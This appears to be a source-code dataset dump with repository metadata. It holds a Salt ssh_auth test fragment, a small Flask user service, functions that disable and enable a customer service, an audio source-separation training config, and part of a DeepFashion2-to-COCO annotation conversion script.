self.assertEqual(
fhr.read(), "ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username)
)
os.unlink(authorized_keys_file)
ret = self.run_state(
"ssh_auth.present",
name="Setup Keys",
source="salt://{0}".format(key_fname),
enc="ssh-rsa",
user=username,
comment=username,
saltenv="prod",
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
self.assertEqual(
fhr.read(), "ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username)
)
| 3,076 | 391 | 23 |
6848665c432b401ac689c588426181ebbfd36cc1 | 232 | py | Python | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | ["MIT"] | null | null | null | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | ["MIT"] | 1 | 2017-01-05T02:25:25.000Z | 2017-01-05T02:25:25.000Z | service_user.py | RobinCAS/CircuitBreaker_py | 941314fec95671a6d5af49f884e585ea1d3a936a | ["MIT"] | null | null | null |
""" service_user.py """
from flask import Flask, jsonify
app = Flask(__name__)
@app.route("/user", methods=['GET'])
def get_user():
    return jsonify(name='CAS')
if __name__ == "__main__":
app.run(port=3002, debug=True)
| 14.5 | 36 | 0.650862 | """ service_user.py """
from flask import Flask, jsonify
app = Flask(__name__)
@app.route("/user", methods=['GET'])
def get_user():
return jsonify(name='CAS')
if __name__ == "__main__":
app.run(port=3002, debug=True)
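# --- Added usage sketch (not part of the original file) ----------------------
# Exercises the /user route without starting a server, via Flask's built-in test
# client; assumes the `app` object defined above is in scope.
def _demo_request():
    with app.test_client() as client:
        response = client.get("/user")
        return response.get_json()  # -> {'name': 'CAS'}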
| 25 | 0 | 22 |
56a6a7bee984a8facda8deb4784fa15bd591ea52 | 2,911 | py | Python | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | ["Apache-2.0"] | null | null | null | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | ["Apache-2.0"] | null | null | null | src/shop/business/service.py | goubertbrent/oca-backend | b9f59cc02568aecb55d4b54aec05245790ea25fd | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.rpc import arguments, returns
from rogerthat.bizz.profile import set_service_disabled as rogerthat_set_service_disabled, \
set_service_enabled as rogerthat_re_enable_service
from rogerthat.rpc import users
from rogerthat.rpc.service import BusinessException
from rogerthat.utils import now
from shop.models import Customer
from solutions.common.dal import get_solution_settings
@returns()
@arguments(customer_or_id=(int, long, Customer), disabled_reason_int=(int, long))
def set_service_disabled(customer_or_id, disabled_reason_int):
"""
Disables the customer his service, disconnects all users and sets the service invisible.
Args:
customer_or_id (int, long, Customer): customer or id
disabled_reason_int (int, long): reason why the service has been disabled
Raises:
NoSubscriptionException
BusinessException
"""
if isinstance(customer_or_id, Customer):
customer = customer_or_id
else:
customer = Customer.get_by_id(customer_or_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
if disabled_reason_int not in Customer.DISABLED_REASONS:
raise BusinessException('Invalid disable service reason')
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
customer.service_disabled_at = now()
customer.disabled_reason_int = disabled_reason_int
sln_settings.search_enabled = False
sln_settings.service_disabled = True
db.put([customer, sln_settings])
rogerthat_set_service_disabled(service_user)
@returns()
@arguments(customer_id=int)
| 35.938272 | 92 | 0.762625 | # -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.rpc import arguments, returns
from rogerthat.bizz.profile import set_service_disabled as rogerthat_set_service_disabled, \
set_service_enabled as rogerthat_re_enable_service
from rogerthat.rpc import users
from rogerthat.rpc.service import BusinessException
from rogerthat.utils import now
from shop.models import Customer
from solutions.common.dal import get_solution_settings
@returns()
@arguments(customer_or_id=(int, long, Customer), disabled_reason_int=(int, long))
def set_service_disabled(customer_or_id, disabled_reason_int):
"""
Disables the customer his service, disconnects all users and sets the service invisible.
Args:
customer_or_id (int, long, Customer): customer or id
disabled_reason_int (int, long): reason why the service has been disabled
Raises:
NoSubscriptionException
BusinessException
"""
if isinstance(customer_or_id, Customer):
customer = customer_or_id
else:
customer = Customer.get_by_id(customer_or_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
if disabled_reason_int not in Customer.DISABLED_REASONS:
raise BusinessException('Invalid disable service reason')
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
customer.service_disabled_at = now()
customer.disabled_reason_int = disabled_reason_int
sln_settings.search_enabled = False
sln_settings.service_disabled = True
db.put([customer, sln_settings])
rogerthat_set_service_disabled(service_user)
@returns()
@arguments(customer_id=int)
def set_service_enabled(customer_id):
customer = Customer.get_by_id(customer_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
sln_settings.service_disabled = False
customer.service_disabled_at = 0
customer.disabled_reason = u''
customer.disabled_reason_int = 0
db.put([customer, sln_settings])
rogerthat_re_enable_service(service_user)
| 525 | 0 | 22 |
fe5748f4771bb5c4cdcf7a649ae541fa6ab87fb5 | 2,589 | py | Python | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 66 | 2021-12-25T17:09:21.000Z | 2022-03-31T08:15:51.000Z | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 13 | 2022-01-06T04:12:37.000Z | 2022-03-20T23:07:12.000Z | config.py | RetroCirce/Zero_Shot_Audio_Source_Separation | 16b5c2cc9f263c6d17894d433a2da31b07788f4d | [
"MIT"
] | 8 | 2022-02-02T17:42:38.000Z | 2022-03-27T09:12:06.000Z | # Ke Chen
# knutchen@ucsd.edu
# Zero-shot Audio Source Separation via Query-based Learning from Weakly-labeled Data
# The configuration file
# for model training
exp_name = "exp_zs_asp_full" # the saved ckpt prefix name of the model
workspace = "/home/Research/ZS_ASP/" # the folder of your code
dataset_path = "/home/Research/ZS_ASP/data/audioset" # the dataset path
index_type = "full_train"
idc_path = "/home/Research/ZS_ASP/" # the folder of audioset class count files
balanced_data = True
# trained from a checkpoint, or evaluate a single model
resume_checkpoint = None
# "/home/Research/ZS_ASP/model_backup/zeroshot_asp_full.ckpt"
loss_type = "mae"
gather_mode = False
debug = False
classes_num = 527
eval_list = [] # left blank to preserve all classes, otherwise will filter the specified classes
# [15, 63, 81, 184, 335, 449, 474, 348, 486, 4] # randomly generated from the 527-classes for held-out evaludation
batch_size = 16 * 8 # batch size per GPU x GPU number , default is 16 x 8 = 128
learning_rate = 1e-3 # 3e-4 is also workable
max_epoch = 100
num_workers = 3
lr_scheduler_epoch = [90, 110]
latent_dim = 2048
# for signal processing
sample_rate = 32000
clip_samples = sample_rate * 10 # audio_set 10-sec clip
segment_frames = 200
hop_samples = 320
random_seed = 12412 # 444612 1536123 12412
random_mode = "one_class" # "no_random, one_class, random, order", one class is the best
# for evaluation
musdb_path = "/home/Research/ZS_ASP/data/musdb-wav/" # musdb download folder
testavg_path = "/home/Research/ZS_ASP/data/musdb30-train-32000fs.npy" # the processed training set (to get the latent query)
testset_path = "/home/Research/ZS_ASP/data/musdb-test-32000fs.npy" # the processed testing set (to calculate the performance)
test_key = ["vocals", "drums", "bass", "other"] # four tracks for musdb, and your named track for other inference
test_type = "mix"
infer_type = "mean"
energy_thres = 0.1
wave_output_path = "/home/Research/ZS_ASP/wavoutput" # output folder
using_wiener = True # use wiener filter or not (default: True)
using_whiting = False # use whiting or not (default: False)
# weight average
wa_model_folder = "/home/Research/ZS_ASP/version_3/checkpoints/"
wa_model_path = "zs_wa.ckpt"
# for inference
inference_file = "/home/Research/ZS_ASP/data/pagenini.wav" # an audio file to separate
inference_query = "/home/Research/ZS_ASP/data/query" # a folder containing all samples for obtaining the query
overlap_rate = 0.5 # [0.0, 1.0), 0 to disabled, recommand 0.5 for 50% overlap. Overlap will increase computation time and improve result quality | 41.758065 | 144 | 0.759367 | # Ke Chen
# knutchen@ucsd.edu
# Zero-shot Audio Source Separation via Query-based Learning from Weakly-labeled Data
# The configuration file
# for model training
exp_name = "exp_zs_asp_full" # the saved ckpt prefix name of the model
workspace = "/home/Research/ZS_ASP/" # the folder of your code
dataset_path = "/home/Research/ZS_ASP/data/audioset" # the dataset path
index_type = "full_train"
idc_path = "/home/Research/ZS_ASP/" # the folder of audioset class count files
balanced_data = True
# trained from a checkpoint, or evaluate a single model
resume_checkpoint = None
# "/home/Research/ZS_ASP/model_backup/zeroshot_asp_full.ckpt"
loss_type = "mae"
gather_mode = False
debug = False
classes_num = 527
eval_list = [] # left blank to preserve all classes, otherwise will filter the specified classes
# [15, 63, 81, 184, 335, 449, 474, 348, 486, 4] # randomly generated from the 527-classes for held-out evaludation
batch_size = 16 * 8 # batch size per GPU x GPU number , default is 16 x 8 = 128
learning_rate = 1e-3 # 3e-4 is also workable
max_epoch = 100
num_workers = 3
lr_scheduler_epoch = [90, 110]
latent_dim = 2048
# for signal processing
sample_rate = 32000
clip_samples = sample_rate * 10 # audio_set 10-sec clip
segment_frames = 200
hop_samples = 320
random_seed = 12412 # 444612 1536123 12412
random_mode = "one_class" # "no_random, one_class, random, order", one class is the best
# for evaluation
musdb_path = "/home/Research/ZS_ASP/data/musdb-wav/" # musdb download folder
testavg_path = "/home/Research/ZS_ASP/data/musdb30-train-32000fs.npy" # the processed training set (to get the latent query)
testset_path = "/home/Research/ZS_ASP/data/musdb-test-32000fs.npy" # the processed testing set (to calculate the performance)
test_key = ["vocals", "drums", "bass", "other"] # four tracks for musdb, and your named track for other inference
test_type = "mix"
infer_type = "mean"
energy_thres = 0.1
wave_output_path = "/home/Research/ZS_ASP/wavoutput" # output folder
using_wiener = True # use wiener filter or not (default: True)
using_whiting = False # use whiting or not (default: False)
# weight average
wa_model_folder = "/home/Research/ZS_ASP/version_3/checkpoints/"
wa_model_path = "zs_wa.ckpt"
# for inference
inference_file = "/home/Research/ZS_ASP/data/pagenini.wav" # an audio file to separate
inference_query = "/home/Research/ZS_ASP/data/query" # a folder containing all samples for obtaining the query
overlap_rate = 0.5 # [0.0, 1.0), 0 to disabled, recommand 0.5 for 50% overlap. Overlap will increase computation time and improve result quality | 0 | 0 | 0 |
02f91dbb53c6aa165b7007d16cdc9f0a7517c844 | 39,932 | py | Python | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | sm047/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | ["Apache-2.0"] | 5 | 2020-06-16T11:31:22.000Z | 2021-11-08T03:07:47.000Z | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | fangchengji/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | ["Apache-2.0"] | null | null | null | projects/FashionNet/scripts/deepfashion2_to_shopee_coco.py | fangchengji/detectron2 | 1036cce320ce0f2adbce7f143566462d3222bd5a | ["Apache-2.0"] | null | null | null |
import json
from PIL import Image
import numpy as np
import shutil
import os
import random
dataset = {
"info": {},
"licenses": [],
"images": [],
"annotations": [],
"annotations2": [],
"categories": [],
"categories2": []
}
dataset['categories'].append({
'id': 1,
'name': "short_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
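# --- Added note (not part of the original script) ----------------------------
# Each category in this script repeats the same 294 keypoint labels "1".."294";
# the same list can be generated programmatically, which is easier to verify:
keypoints_1_to_294 = [str(i) for i in range(1, 295)]
assert len(keypoints_1_to_294) == 294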
dataset['categories'].append({
'id': 2,
'name': "long_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 3,
'name': "short_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 4,
'name': "long_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 5,
'name': "vest",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 6,
'name': "sling",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 7,
'name': "shorts",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 8,
'name': "trousers",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 9,
'name': "skirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 10,
'name': "short_sleeved_dress",
'supercategory': "clothes",
